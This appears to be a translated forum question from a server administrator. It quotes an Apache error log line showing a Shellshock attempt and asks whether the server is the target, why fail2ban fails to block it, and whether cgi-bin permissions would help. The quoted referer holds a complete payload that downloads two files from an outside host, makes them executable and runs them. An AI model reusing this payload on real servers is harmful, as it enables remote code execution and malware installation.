Nei miei file di registro vedo centinaia di questi registri. Devo dire che l'IP del client cambia a volte. Quindi ci sono 3 o 4 IP che inviano queste richieste ...
L'altruiqualcosa (che ho omesso) è sempre la stessa.
[Sat Apr 11 21:34:13 2015] [error] [client xx.xxx.xx.xxx] script not found or unable to stat: /home/Myuser/web/myweb.something/cgi-bin/php5-cli, referer: () { :;} ;echo;/usr/local/bin/php -r '$a = "http://othersite.something//Help1";''$b = "http://othersite.something//Help2";''$c = sys_get_temp_dir();''$d = "Help1";''$e = "Help2";''$f = "chmod 777";''$g = "file_put_contents";''$h = "system";''$i = "file_exists";''$j = "fopen";''if ($i($c . "/$d"))''{''exit(1);''}else{''echo($c);''$g("$c/$d", $j("$a", "r"));''$g("$c/$e", $j("$b", "r"));''$h("$f " . $c ."/$d");''$h("$f " . $c ."/$e");''$h($c . "/$d");''$h($c . "/$e");''}'
Alcuni attacchi cercano di usare il mio server per fare qualcosa su un altro server (othersite.qualcosa)?
O questo attacco è di nuovo il mio server?
Ho visto che tutti i registri appaiono come [errori] ma vorrei fermarmi dopo x tentativi falliti ...
Ma sembra che fail2ban non funzioni correttamente.
Devo anche dire che non sto usando la cartella cgi-bin ... non c'è nulla di iniside ... posso semplicemente impostare i permessi 640 o 600 per evitare questo?